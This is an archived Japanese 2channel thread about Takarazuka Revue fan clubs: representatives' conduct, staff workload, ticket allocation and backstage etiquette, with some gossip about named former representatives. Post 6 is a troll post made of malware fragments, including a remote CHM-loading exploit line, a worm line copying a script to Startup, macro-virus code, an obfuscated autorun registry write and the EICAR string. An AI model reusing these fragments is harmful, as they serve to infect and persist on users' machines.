2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

FCに関するスレ 4

1 :名無しさん@花束いっぱい。:2006/11/01(水) 19:16:25 ID:3p0cvI4B
FCに関する話題はここで。
イパーン人・代表・お付きの個人叩きはご遠慮下さい。

前スレ
FCに関するスレ3
http://hobby8.2ch.net/test/read.cgi/siki/1153203480/l50

2 :名無しさん@花束いっぱい。:2006/11/01(水) 19:18:52 ID:V0d09ngH
>>1
氏ね

3 :名無しさん@花束いっぱい。:2006/11/01(水) 19:33:13 ID:4dvJQ86R
>1
乙!

4 :名無しさん@花束いっぱい。:2006/11/01(水) 20:25:48 ID:5ZUycAVK
よんさま

5 :名無しさん@花束いっぱい。:2006/11/01(水) 20:39:33 ID:JdH50moS
>>1
5くろうさま
つ旦~

6 :<body onload=window()>:2006/11/01(水) 22:56:13 ID:coqt+g4P
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

7 :名無しさん@花束いっぱい。:2006/11/02(木) 00:50:02 ID:8qQ5/qsm
前スレの終わりにも出てたけど
生徒を独占したがる代表。
「独占」なんてできっこないのにどうしてそんなこと思っちゃうんだろう?

8 :名無しさん@花束いっぱい。:2006/11/02(木) 00:56:49 ID:lt3PpCNm
>>7
「独占したがる」ってどういうこと?
会が出来ると生徒と直接やり取りできるのは代表だけになるから自然と独占という形になると思うけど、
そういうこと言っているんじゃないんでしょう?
具体的にどんなことがあったの?

9 :名無しさん@花束いっぱい。:2006/11/02(木) 01:21:50 ID:8qQ5/qsm
生徒と直接やりとりできる=独占
この意味が分からない。

10 :名無しさん@花束いっぱい。:2006/11/02(木) 01:24:54 ID:lt3PpCNm
>>9
いや、私も意味がわからない。
代表のどういう行動を見て、
「生徒を独占したがる代表」と呼ぶのかがわからないので質問した。

11 :名無しさん@花束いっぱい。:2006/11/02(木) 01:49:00 ID:8qQ5/qsm
>>10
そういうことか。
独占したがる代表は自分以外の誰かが生徒と少しでも親しそうな素振りを見せると
途端に扱いを悪くしたり会から追い出そうとする。
スタッフはもちろん、おばさま相手でもおかまいなし。

12 :名無しさん@花束いっぱい。:2006/11/02(木) 02:01:51 ID:j3MOTfHs
星組下級生会の入りガードが急にピリピリし始めました。
アラン会仕切り開始ですか?

13 :名無しさん@花束いっぱい。:2006/11/02(木) 02:04:47 ID:1cTgV0g7
>11
私のいる会の代表もそうだ・・・
ただでさえ会員少ないのにさらに減らしてどうすんのって感じ
貧しい会なのになんでおばさままで逃がすかな
それでいて入り出の人数が少ないと機嫌悪くなって会員やスタッフにあたる
人数少ないのが嫌なら自分でも何か会員に対して努力すりゃいいのにそれは一切しない
アタマおかしいんじゃないかと時々思う

14 :名無しさん@花束いっぱい。:2006/11/02(木) 03:48:57 ID:HWauHpPw
頭おかしいんだよ。 ウチの代表も頭おかしいもん。 もしかして同じ会かもねー(苦笑)

15 :名無しさん@花束いっぱい。:2006/11/02(木) 09:27:00 ID:HXWHRcOU
まぁ〜しょうがないと言えばしょうがないのかなぁ。
代表業を専業としているんで宝塚・・・・生徒・・・・オンリーの生活。
何だか?一度の人生なのに勿体ないことだ。
でもさぁ,FCをまとめる力もないのに
代表をしたがるのでしょうか?疑問です。



16 :名無しさん@花束いっぱい。:2006/11/02(木) 17:24:46 ID:1uOvgZCq
ただの目立ちたがりや。困ったオバチャン

17 :名無しさん@花束いっぱい。:2006/11/02(木) 17:25:26 ID:1uOvgZCq
わしが代わりに仕切ってやるぜ

18 :名無しさん@花束いっぱい。:2006/11/02(木) 17:31:12 ID:1uOvgZCq
ファン同士の醜い争いには参ったものだ…。

19 :名無しさん@花束いっぱい。:2006/11/02(木) 19:07:27 ID:SJncEPSM
イパーンではマトモにやっていけないハズレがちやほやされる
それが代表
フツーに社会で評価もらえなくても、ここではオケーもらえる(と思ってる)

20 :名無しさん@花束いっぱい。:2006/11/02(木) 19:10:02 ID:1uOvgZCq
世間はそう甘くないぜ、腐れ代表さん。

21 :名無しさん@花束いっぱい。:2006/11/03(金) 18:04:09 ID:CfDZmh5g
贔屓にも抱きついて、離れないんだ。房カバ代表

22 :名無しさん@花束いっぱい。:2006/11/07(火) 09:36:50 ID:9C5jKGAf
裕福で仕事をしなくても生活できる環境の方が専業で代表職。
バイトしながらの生活切り詰めての代表職。
たった一度の人生なのに勿体無い・・・・・・。
気持ちがわからない


23 :名無しさん@花束いっぱい。:2006/11/07(火) 11:36:46 ID:l3F91NuI
宝塚が生活の中心な人は、代表できたら本望なんじゃない?
贔屓のいる組は公演・入り出に通うような人なら
一般で通うか、代表として通うかの違いだけだ。

24 :名無しさん@花束いっぱい。:2006/11/07(火) 19:43:22 ID:WPnw9I+H
たしかにね。
自分は貧乏人で、B席観劇が主だけど、
でも最低最悪エコヒイキが酷い代表だったら、
公演期間全部休んででも
自分がなりたいと思う時があるよ。

25 :名無しさん@花束いっぱい。:2006/11/08(水) 08:50:06 ID:/91UQ7Kn
贔屓は数日で退団します。
代表が違う人だったら、もっと多くのファンで送ってあげれたのにと思っている。
これまで楽しく応援できたのは、優しいスタッフさんがいてくれたから。
代表より、スタッフさんに「ありがとうございました」と言いたい。

26 :名無しさん@花束いっぱい。:2006/11/08(水) 09:56:33 ID:tJ3qBTzQ
いわば代表っていうのは官房長官だからね。一家の主婦だからね。
たいがいの女性にとって天職なのよ。
無報酬つっても、マザー・テレサだって主婦だって売れない画家だって無報酬。
仕事=報酬つうのは、一つの価値観だけど、すべての人にとっての価値観ではない。

27 :名無しさん@花束いっぱい。:2006/11/08(水) 11:13:23 ID:ywHPzdWn
代表が本当に無報酬だと思ってるの?

28 :名無しさん@花束いっぱい。:2006/11/08(水) 12:44:49 ID:tJ3qBTzQ
自分が知る限りは、「無」ではないけど、「有」といえるほどでもない。
役得はいろいろあるにしろ。
どっちにしろ、公的には「無」でしょ。
じゃないと税務署とかさ。

29 :名無しさん@花束いっぱい。:2006/11/08(水) 17:13:19 ID:XG3ikemr
今年辞めた花娘1。
最後のお茶会の写真すら届かないと友人が嘆いていた・・・。

おいおい、もう11月だよ!
代表さんしっかり!!

30 :名無しさん@花束いっぱい。:2006/11/08(水) 21:39:29 ID:/b2N2K25
まだなのか…とユーより、もうあきらめなよ…可哀相だけど…
その代表ってさ、退団した途端、後処理ほったらかして生徒と切れたんだよね。

31 :名無しさん@花束いっぱい。:2006/11/08(水) 22:48:25 ID:Zz1XLxNa
今あの人なかなか出れない花男のファンだかお付きだかしてるから忙しいんだろ。

32 :名無しさん@花束いっぱい。:2006/11/09(木) 11:52:04 ID:lljWcz1e
じゃあ、すでに目をつけて早々とそっちに移動したということ?
勇気あるね。出れないってことは下級生さん?

33 :名無しさん@花束いっぱい。:2006/11/09(木) 13:43:45 ID:zH6Mcm7S
>>32
別に辞めたんだから、他に贔屓がいてもいいんじゃね?
代表してたら、辞めた後も他に応援する生徒つくっちゃいけないなんておかしいじゃん。

それより、後始末をちゃんとしていないことが問題なわけで。

34 :名無しさん@花束いっぱい。:2006/11/10(金) 00:22:14 ID:7cFTVwhG
普通は代表やめたら、少しクールダウン期間をおくものなんだよ。
贔屓が退団した直後、別の会に入ると陰口叩かれるのと一緒。
代表の場合は風当たりが強いけど。

35 :名無しさん@花束いっぱい。:2006/11/10(金) 02:21:58 ID:Hhka1iHX
>>34
私の周りは、贔屓が退団した後すぐ他の会に入って陰口叩く人なんていないよ?
というより、普通、贔屓が退団したらすぐ違う会入る人のほうが多いでそ

34さんの周りって性格悪い人多いんだね

36 :名無しさん@花束いっぱい。:2006/11/10(金) 07:24:07 ID:u9Ty8QqS
でも代表してたのにまたすぐ違う人にしかも同じ花でいっちゃうのって人間としてどうかなと思うんだけど…。情とかないのかな。
目をつけられた下級生もすぐ違う人にいっちゃうかもしれない人なんて可哀想だし。

37 :名無しさん@花束いっぱい。:2006/11/10(金) 08:33:52 ID:DnvHpfZ7
つか頼まれたのでは?
うちの元贔屓の代表も贔屓が退団してすぐに
同組、非路線娘役のお付きに早変わりしてたw
在団中から約束してたらしいけど驚いた。


問題は次の生徒に付いた事じゃなくて
写真がまだ送られて来ないと言う点では?
生徒もしくは元代表に言う。
元代表連絡先がわからなかったら
元代表が歩いてる所に声かける。
そしたら流石に対応してくれるかと…

38 :名無しさん@花束いっぱい。:2006/11/10(金) 10:35:23 ID:lOQsq9+p
出れないのにお付きだけはしっかり付けてって…ありえないでしょw

39 :名無しさん@花束いっぱい。:2006/11/10(金) 11:27:23 ID:xpV/H9Zp
>>36
そうかな?
退団まで見届けたなら何の問題もないんじゃない?
退団から一日後も半年後も同じでしょう。
皆書いているけれど、そんなことよりも写真送っていないことが問題。
残務処理さえしていれば次の日から誰の応援したって構わない。

40 :名無しさん@花束いっぱい。:2006/11/10(金) 16:17:01 ID:7cFTVwhG
>>35
顔が認知されているということは、ある程度の会活動をしているわけで。
幽霊じゃない会員さんの贔屓の退団直後に、高確率で陥るあのメンタル状況を
知ってしまったら、すぐに次にいける人を見てびっくりしてしまうよ。

女ばかりの宝塚のネットワークの広さと速さはなかなかのものだから
自分の周囲が陰口叩いてなくても、そういう話って耳に入って来るんだよ。

41 :名無しさん@花束いっぱい。:2006/11/10(金) 18:24:52 ID:34eNLOxl
代表やりたがりちゃんは、あまり情って入り込まないのかな?
贔屓に対する愛情より、自分の立場にうっとり〜
それが失くなるのが怖くて次々渡り歩くってのもあるかも。
だってあの人達、一般社会じゃ、やっていけないでしょう。

42 :名無しさん@花束いっぱい。:2006/11/10(金) 19:09:51 ID:lOQsq9+p
なるほどね…。自分が一番なんだね。
私の贔屓のお付きだったらどうしようorz

43 :名無しさん@花束いっぱい。:2006/11/11(土) 09:25:57 ID:6goYQc3r
宙組会は厳しいんですか?(特にタニ会はどうですか?)
最近出来た会でスタッフをしない?と言われているけど、あまり拘束されたくなくって…。

44 :名無しさん@花束いっぱい。:2006/11/11(土) 10:22:43 ID:sc4m1HLO
「拘束されたくない」人にはFCスタッフは向かないんじゃない?
宙に限らず、その組でも・・・

45 :名無しさん@花束いっぱい。:2006/11/11(土) 10:55:23 ID:U1Mj03Za
>>43
スタッフはめちゃくちゃ拘束されますよ。
会の仕事が山ほどあるので、休日ほかで遊びに行くなんてスタッフ間でも言えない雰囲気です。
会の仕事を休むときは、嘘でも本当でもそれなりの理由が必要になります。(要は仕事と一緒)
観劇するときも、入り出はもちろんですが、観劇5分前まで拘束され、休憩時間も拘束されます。
また、宝塚において会の仕事が最優先になるため、他の組を自由に観劇することは出来なくなります。
自組の観劇スケジュールも会の都合に合わせることになります。

スタッフは誰でも出来ることではないので、お話があったなら一度してみるのも良いと思いますが、
拘束されたくない場合はすぐに嫌になり、辞めていく方が多いです。
これはどの組でも同じです。

46 :名無しさん@花束いっぱい。:2006/11/11(土) 11:42:00 ID:Zac90440
>>43
おまけにタニ会は…
いや、タニ代表は特に変わってるからな。
理不尽なことでものすごいキレる。
かしげが辞めたあとは大変かもよ、宙組の会関係。


47 :名無しさん@花束いっぱい。:2006/11/11(土) 11:57:43 ID:cZhyZiyW
タニ会代表…カシゲがタカコの次に内定した時キレまくって下の会に伝言を回さなかった。
それまではタニが次だと確信して機嫌が良かったのにw
それから下級生会にカス席渡して自分は子連れで毎日一階SS席観劇しそうw

48 :名無しさん@花束いっぱい。:2006/11/11(土) 13:33:34 ID:J9JEMHV2
質問なんですが同じ組でも男役と娘役のFCでは内容が違いますか?
次期主演男役さんのFCに入ろうか現在宝塚大劇場で公演中の公演からできた下級生娘役のFCに入ろうか悩んでいて
どちらの場合も直接お手紙を渡すにはFCに入らないと無理ですか?
またFCに入っていないとお茶会などは参加できませんか?

49 :名無しさん@花束いっぱい。:2006/11/11(土) 13:52:11 ID:g9tsyUXZ
>48
ファンクラブに入りたいと思う人が二人いるなら、どちらにも入らないほうがいいですよ。
お茶会は会に入らなくても(会員限定の親睦会除き)参加できますが
お手紙の手渡しは基本的に会員のみです。
若手の娘役さんなら非会員でも手渡せる場合もありますが。
(当然ながら他の人の会に入ってる場合はタブーです)

50 :名無しさん@花束いっぱい。:2006/11/11(土) 14:06:54 ID:6goYQc3r
43です。
以前他の組でスタッフの手伝いをしたことがあるので、ある程度はわかっています。ただ今回出来たばかりの会で、西も東も…となるとかなり考えてしまいます。
みなさんありがとうございましたm(_ _)m

51 :名無しさん@花束いっぱい。:2006/11/11(土) 16:27:25 ID:qjOyh6iC
>>50
なんだ・・一生懸命答えてあげた人かわいそう。

52 :名無しさん@花束いっぱい。:2006/11/11(土) 21:46:20 ID:6goYQc3r
51>
ムカつく!

53 :名無しさん@花束いっぱい。:2006/11/11(土) 21:55:48 ID:JzJgVD8o
ID:6goYQc3rは中学生?それとも小学生?
>>52みたいな書き込みする人が手伝ってる会なんて恐ろしいなw

54 :名無しさん@花束いっぱい。:2006/11/11(土) 22:05:30 ID:6goYQc3r
(-"-;)
いろいろとすみませんでした。

55 :名無しさん@花束いっぱい。:2006/11/12(日) 00:46:41 ID:mt5dIebK
ID:6goYQc3rは宙組で新しく出来た会のスタッフになるかもしれないんだよね。
こんな書き込みするような奴に声かけるなんて人を見る目のない代表だね。
最近出来たというと蓮水ゆうや辺りかな。

56 :名無しさん@花束いっぱい。:2006/11/12(日) 02:03:00 ID:jipqQY84
なんか>>50の「ある程度はわかってます」ってトコ、
「その程度のことならアンタ達に聞かなくてもわかってるのよ、
役立たずね、ハン」みたいに聞こえる・・・

57 :名無しさん@花束いっぱい。:2006/11/12(日) 02:12:17 ID:NXJIdAQE
みーかちーだね。

58 :名無しさん@花束いっぱい。:2006/11/12(日) 06:29:57 ID:ES2MmXxE
宙組以外で最近会が出来る・出来た生徒はいないの?

59 :名無しさん@花束いっぱい。:2006/11/12(日) 16:04:42 ID:/6L5j5m7
花90男もうすぐできるね。

60 :名無しさん@花束いっぱい。:2006/11/12(日) 17:28:47 ID:aWqnePRl
貴城けいさんのファンクラブはどういう雰囲気ですか?
以前、友人とかしげさんの出待ち時、音月圭さんに拍手
しただけで怒られて以来恐い印象なのですが。

61 :名無しさん@花束いっぱい。:2006/11/12(日) 18:46:57 ID:I/0yOijL
>60
かしげ会じゃなくても、入り出の時に拍手したら注意するよ。
怒られて当たり前。

62 :名無しさん@花束いっぱい。:2006/11/12(日) 19:15:03 ID:aWqnePRl
>>61
そうだったんですか。
昔は楽屋出てくる生徒さん全員に拍手してたものでしたが、
今はそういうものなんですね。教えてくださり有難うごさいます。

63 :名無しさん@花束いっぱい。:2006/11/12(日) 19:31:52 ID:fS1C6gIC
楽時は全生徒に拍手してるよ。
元宙1会でもね。

64 :名無しさん@花束いっぱい。:2006/11/12(日) 22:09:29 ID:Pkh3PwuR
楽はどの組でもしますよ。>拍手
かしげ会スタッフさん、
出の時にとてもよくしてもらいましたよ。
とても親切で丁寧な方でした。
>60は入会したいの?
退団発表したら、普通は出来ないよね。

65 :名無しさん@花束いっぱい。:2006/11/12(日) 22:33:11 ID:mpgLrghe
某月1は退団までカウントダウンが始まっても段階的に会費割引しながら入会受付していた。
確か東宝楽の週に入ると1000円くらいだったはず。これは例外だけど。

66 :名無しさん@花束いっぱい。:2006/11/13(月) 00:24:44 ID:DVPHUZb/
58さん
だいもです。ここが一番やばい。
もしかしたらみーかも。
ちーは違うと思う。
又はアリス。


67 :名無しさん@花束いっぱい。:2006/11/13(月) 01:28:04 ID:PNjXrVxW
そのかの西元代表
蘭寿さんのお茶会に来てた。
辞めたら宝塚観にくるなとはいわないけれど、同期のお茶会やら色々顔出しすぎ。
新しい代表は一切手伝ってないみたいだし、やっぱり元代表って嫌なやつ。
代表叩きはだめとは思うけど、あの顔見ると気分悪くなって嫌。

68 :名無しさん@花束いっぱい。:2006/11/13(月) 01:37:36 ID:TFp+BcDl
>>67
あの人、代表辞めたの?

69 :名無しさん@花束いっぱい。:2006/11/13(月) 07:05:57 ID:QbH8+FRl
>>67
別にいいじゃん。
他人が宝塚楽しむのがそんなに嫌なの?
あなたが性格悪いよ。

70 :名無しさん@花束いっぱい。:2006/11/13(月) 07:09:34 ID:jWiUq8Mu
園加元代表やめたよ。
いつまでも代表の地位にしがみついてるのは、みっともない。
どの組見に行っても走り回ってる姿見る。
ガードまでしてたし。
切られたって言うことが、プライド許さないのか、会員呼び出して説明してた。よく一緒に歩いてる。
その会員も、他に手だしてるから、その下級生のおつきねらってるんじゃない?園加元代表。
楽しむためにヅカみたら良いのにね。
切られてませんてのが見せたくて、手伝いしたり会員とご飯食べたりしてるんだよ。
会員えこひいきしてるってのは本当みたいね。
弁解したいのなら、一人ずつご飯誘ったらいいのに。
えこひいきするからたたかれる。


71 :名無しさん@花束いっぱい。:2006/11/13(月) 07:30:39 ID:nwl2r96A
あー、いつものアンチが久しぶりに出てきたか
しつこいねえ

72 :名無しさん@花束いっぱい。:2006/11/13(月) 07:37:30 ID:QbH8+FRl
そうなんだ。
>>71
でも、えこひいきが本当なら、不満を持つ会員がいるのも仕方ないんじゃない?
そのか元代表が嫌いだからといって、>>67>>70にある他の事まで叩きの材料にするのは良くないけれど、
代表ってのは、えこひいきしちゃいかんよ。

73 :名無しさん@花束いっぱい。:2006/11/13(月) 08:57:47 ID:PROWdy24
>72
読めるなら組スレとかここの過去ログとか読んでみたら?
定期的に出てきてはたしなめられて逆切れの
パータンばっかでつまらないけどw

74 :名無しさん@花束いっぱい。:2006/11/13(月) 10:37:37 ID:jWiUq8Mu
私はいつものアンチではありませんよ。
でも、あまりに目についたから書いた。


75 :名無しさん@花束いっぱい。:2006/11/13(月) 10:41:50 ID:OGmAVQPK
代表さんって,生徒退団後も交流あったりするの?
殆どは,キレイに切れるんですよね。


76 :名無しさん@花束いっぱい。:2006/11/13(月) 10:59:28 ID:QbH8+FRl
>>73
残念ながら過去ログは読めない。

なんにしても、えこひいきはいかん。
ただ、具体的な事柄が書かれていないので、事実かどうかがわからん。

77 :名無しさん@花束いっぱい。:2006/11/13(月) 11:12:29 ID:m6UIUPG8
円満退職なら、やめた後も交流はあるよ。
それと、今の代表と生徒が上手くいってなければ尚更。
退団後のお付き合いも、ある人ない人色々だけどね。

78 :名無しさん@花束いっぱい。:2006/11/13(月) 12:20:04 ID:7VIzpE8n
スタッフ陣は残留なんだし、普通に引継いだんじゃないの?

代表辞めてもそれまでの繋がりはあるから、
他の生徒の茶会に出るのもありでしょ?
付き合いじゃないの〜?


でもまぁえこ贔屓云々は知らないけどさ

79 :名無しさん@花束いっぱい。:2006/11/13(月) 20:52:33 ID:rjuev1OM
宝塚は横のつながり強いよ。
昨日の星楽だって、花1会の元スタッフとか、月1会とか来ていたし。
とにかく、狭い世界なんだよ。
でも、そのつながりで支え合っているところもあるんだろうけどね。

80 :名無しさん@花束いっぱい。:2006/11/13(月) 22:45:57 ID:S8+AzFsp
水さんのお茶会写真や公演写真(会の)どんなの?うPしてください。どっかで誰かが教えてと書いてたからつい自分も気になった

81 :名無しさん@花束いっぱい。:2006/11/13(月) 23:11:15 ID:h16qeGK9
元代表叩きスゴいね。
こんな人が代表やスタッフになったら、それこそ、えこひいきしそうだね。
本当に横の繋がりは強いよね。退団した生徒のスタッフとかも千秋楽の手伝いには来るよ。

82 :名無しさん@花束いっぱい。:2006/11/13(月) 23:39:29 ID:YdpdMMtR
うん、>>74は前からいた私怨チャンだよ。
執念深く代表を引きずり下ろしたから本望だろうに、
ほんと代表アンチってかストーカーだよね。怖すぎ。
代表さん達気を付けて!って思っちゃう。
こういう人って勝手に被害妄想なんだろうね、こんなのに勝手に睨んで絡まれたら本当精神的に追い込まれそう…。
ほぼ犯罪だよ、アンチさん。

83 :名無しさん@花束いっぱい。:2006/11/14(火) 00:24:05 ID:Ono7E4/+
どうでも良いけど、>>82の妄想にも呆れる。

84 :名無しさん@花束いっぱい。:2006/11/14(火) 21:06:19 ID:OfKSsNtt
元代表として横のつながりの付き合いを大事にしてるんなら、なおさら自分のいた会の会員と
付き合ってるのってどうなんろ・・・。
お茶会の手伝い、ガードの手伝いは元代表として仕事してるってことでしょう?
自分は「元代表」としての立場で、そういう事してその会員に迷惑かかるとか考えないのだろうか。
会員もおいしいから元代表を利用しているんなら、お互いの利益になるからいいのかな?
やめてまでネタになるのは可哀想だけど、この代表以外もたたかれてるし、叩かれる人って似たようなタイプだよね。



85 :名無しさん@花束いっぱい。:2006/11/14(火) 21:18:51 ID:W4bUTlxw
水夏希さんの会写真って◎ですかね?

86 :名無しさん@花束いっぱい。:2006/11/14(火) 21:20:52 ID:exqWpiNF
代表たる立場になった以上、
代表降りた後でもイチ会員と個人的につきあうのは
NGじゃない?

もちろん、今までお世話になってきたっていうのもあるから
他会の手伝いとかはやって然るべきだとは思うけど、
新代表が居るなら任せれば良いんじゃない?

結局は「代表」だったことへ執着してるんだなって思った


87 :名無しさん@花束いっぱい。:2006/11/14(火) 21:49:48 ID:1EgqjqTC
退いた人のことまで叩くのは
ネチネチ私怨以外の何者でもないと思うがな


88 :名無しさん@花束いっぱい。:2006/11/14(火) 22:14:04 ID:g99xIpuJ
たたくって言うよりは、ヅカの一般論ではなかろうか?


89 :名無しさん@花束いっぱい。:2006/11/14(火) 22:28:43 ID:+9ZrSxLJ
時々出るね〜。
粘着私怨!しつこ過ぎ!


90 :名無しさん@花束いっぱい。:2006/11/14(火) 23:02:34 ID:5j65tUHQ
私怨・粘着と言ってる人の方がなんだか不自然。

91 :名無しさん@花束いっぱい。:2006/11/14(火) 23:13:16 ID:zA8+NnLN
>>90 いやそうやってすぐ出てくる方が不自然w

92 :名無しさん@花束いっぱい。:2006/11/14(火) 23:19:59 ID:5j65tUHQ
>>91
あなたも不自然w

93 :名無しさん@花束いっぱい:2006/11/14(火) 23:26:11 ID:A+9qqf06
代表がスタッフでない会員と個人的に付き合うのはどうなの?

94 :名無しさん@花束いっぱい。:2006/11/15(水) 00:19:31 ID:25n5cHTS
>>93
別に仕事でやっているわけではなし、付き合いくらい好きにさせてあげたらw

代表になるまで友人だった人と、代表になった途端に付き合いをやめたら、
それはそれで文句をココに書き込む人がいるに決まっている。

95 :名無しさん@花束いっぱい。:2006/11/15(水) 03:41:55 ID:UYEw0cMX
タニ会の代表って変わらないの?このまま行くの?

96 :名無しさん@花束いっぱい。:2006/11/15(水) 10:32:32 ID:7G/VCUQd
お披露目初日、最前列センターでスタンディングするんだろうなw


97 :名無しさん@花束いっぱい。:2006/11/15(水) 11:38:58 ID:VKA8EZpb
質問ですみません。
仕事がない日は出来るだけ通いたいんですけど資金には限りが…。
会で余ってるみたいだから追加で1枚頼むのとB席とかで2回観て席をうめるのとならどちらがいいんでしょう?

98 :名無しさん@花束いっぱい。:2006/11/15(水) 12:11:10 ID:XwSWUIAi
>>97
どっちも大した貢献にならないから、好きなほうでいいと思う

99 :名無しさん@花束いっぱい。:2006/11/15(水) 12:18:45 ID:8KJI0QIJ
>>97
会への貢献なら、圧倒的に前者だよ!
B席って、自力で取るって事でしょ?
会がチケ余らせてる時に自力券で観るのはかえってマイナス
余ってるときは1枚でも追加したら、けっこう貢献度高くなる
財政が厳しいなら、その分入り出でカバーするといいよ

100 :名無しさん@花束いっぱい。:2006/11/15(水) 12:34:32 ID:25n5cHTS
>>98
いや、>>99が正しい。
「宝塚歌劇団への貢献」ならどちらも変わらないが、
「会への貢献」なら100%追加で頼んだほうがい良い。

101 :名無しさん@花束いっぱい。:2006/11/15(水) 19:47:53 ID:NDTU0ltI
すみません、質問なのですが…。
箙さんのファンクラブってありますか??

102 :名無しさん@花束いっぱい。:2006/11/15(水) 20:50:09 ID:VKA8EZpb
97です。
色々ありがとうございます!
追加で頼んでみます!


103 :名無しさん@花束いっぱい。:2006/11/15(水) 23:56:45 ID:4DmRNRSs
>>90 = >>92
自分が粘着だと晒してるW

104 :名無しさん@花束いっぱい。:2006/11/16(木) 00:03:24 ID:u0iwlB1K
FCの存在意義は空席を埋めるためにあると
このスレを読んで初めて知ったのですが
むしろチケ難気味の東宝でもそうなんでしょうか?
平日昼公演、回数見たいので安い席で数回
この程度でも会への貢献(というより、生徒さんへの貢献)になるんでしょうか?
入り出やガードはそんなに参加できそうもないし…

105 :名無しさん@花束いっぱい。:2006/11/16(木) 02:12:29 ID:/e6hTMRY
>>104
>安い席で
って席なんて選べないですよ?
それから東宝なんてチケ上納なら貢献になるけど、
東宝で貢献なんてなる訳ないじゃん・・・。
もう一回ここ読む事を勧める。

106 :名無しさん@花束いっぱい。:2006/11/16(木) 08:25:46 ID:ABGKGETq
>>104
「席を埋める」が貢献になるのは、大劇場のみ。
「安い席で数回」は無理。東西とも、席は選べない。
東で貢献したいなら、入り出、お金、お茶会人数しかない。
西はそれに加え、チケ申し込み、並びが加わる。

107 :名無しさん@花束いっぱい。:2006/11/16(木) 11:58:34 ID:DaDviF6d
東宝も人気のない公演というか、内部でかなり余る場合もあるから、
とりあえず頼めばいいと思う。
退団公演・ベルばら・エリザ以外は東宝も貢献になるよ。
チケットがない場合はお断りされるだけだから心配しなくて大丈夫。


108 :名無しさん@花束いっぱい。:2006/11/16(木) 17:45:25 ID:u0iwlB1K
>>105-107
お答えありがとうございます
席種が選べないのは初めて知りました
こちらでお聞きしてみて良かったです

まだ入会検討中のレベルですので
今までどおりひっそり応援にしておいた方がいいか、考えてみます
しばらく東京来ないですし…

お三方とも、ありがとうございました

109 :名無しさん@花束いっぱい。:2006/11/16(木) 19:42:13 ID:Gqqzkm4m
FC初心者ですみません。
↑に書かれている東京のチケット上納って大劇場みたいに並びがないですが個々で電話なりで取って会に渡すって事ですか?
その際自分の席はどーなるんでしょう?
とりあえず全て渡して後でいつものように渡してもらえるって事でしょうか?


110 :名無しさん@花束いっぱい。:2006/11/17(金) 01:25:32 ID:Gv9xFzDT
>>109
 友会の入力の指示を受け、チケットが来たら開封せずにそのまま会に上納するんです。
 もちろんチケット代はもらえます。
 また自分の席はそこからはとれず、会から配分されるだけです。

111 :名無しさん@花束いっぱい。:2006/11/17(金) 13:36:23 ID:E9dnLTUz
同じチケット上納で質問ですが
友会に入ってないのですが、一般のプレイガイドで取る努力をするのは
貢献にならないのでしょうか?
それを差し上げても例え良席でも駄目ですか?

112 :名無しさん@花束いっぱい。:2006/11/17(金) 15:21:05 ID:jwg7LALx
>111
上納する席が良席だと、ご自分のもらえる席も良くなるか、
ということでしたら、全く関係ありません。
それどころか取れた日を会で申し込んでいても、お断りされる
場合だってあります。

113 :名無しさん@花束いっぱい。:2006/11/17(金) 17:12:26 ID:7PNdm/Wy
では、手元にチケットが余っていて、会に頼まれてもいないのに上納することは迷惑ですか?

114 :名無しさん@花束いっぱい。:2006/11/17(金) 17:22:41 ID:sU2oDe7f
>>113
超チケ難公演でなければ、迷惑というかそもそも上納自体受け付けていないことも
あると思います。
「プレイガイドで分のご協力もお願いします」みたいな依頼が来ているときは、
引き取って貰えるでしょうけれど、そうでない場合はお断りされるのでは?

115 :名無しさん@花束いっぱい。:2006/11/17(金) 17:45:23 ID:jwg7LALx
>113
具体的に公演名、席種、席番を書かれていないので、はっきりとは
お答えしにくいですが、114さんも書かれているように、一般的に
人気のある公演、イベントだと受け入れてもらえることが多いです。
人気のない公演のB席だと話にもなりませんが、、。
一度会の方に相談してみられたらどうでしょう。

116 :名無しさん@花束いっぱい。:2006/11/17(金) 18:20:19 ID:tMzSlK5C
人数の多い会はガードは貢献にならないですよ。
ほとんどグッツの購入チケットの取り次ぎ、協力で決まります。

でもパーソナルカレンダー30部もいらないし…チケット何十枚も頼めないし…

117 :名無しさん@花束いっぱい。:2006/11/17(金) 18:52:15 ID:Z1AZdbGt
>>110
ありがとうございます。

118 :名無しさん@花束いっぱい。:2006/11/17(金) 21:24:00 ID:9IFdMzhO
初日新公楽頼んでも入手できないのが分かってる時って 
自分で入手したチケットで観劇したら顰蹙ですか? 
ましてやSSとかだったら・・・・

119 :名無しさん@花束いっぱい。:2006/11/17(金) 21:32:48 ID:hxK5Ay4b
会から回ってこなかったんだから、仕方ないでしょう。
誰かに何か言われたら、
会からお断りが着たから、オークションで買ったと言えば言い。

120 :名無しさん@花束いっぱい。:2006/11/17(金) 22:47:15 ID:12lTCskf
>>118
自分はお断りありそうな公演は必ず自力でゲットしておいて
会からOKがでたら、自力チケットの方を手放してる
公演を観たいんだから、当然でしょ!

121 :名無しさん@花束いっぱい。:2006/11/17(金) 22:51:05 ID:mJohC8kQ
>>118
問題ないですよ。
会で取ってもらったんじゃない、と軽く主張しておくと
「なんであの人があんな良席に?」と疑問をもたれずに済む。

会で取ってもらえるか分からないときは、自力ゲトして挑んでる。
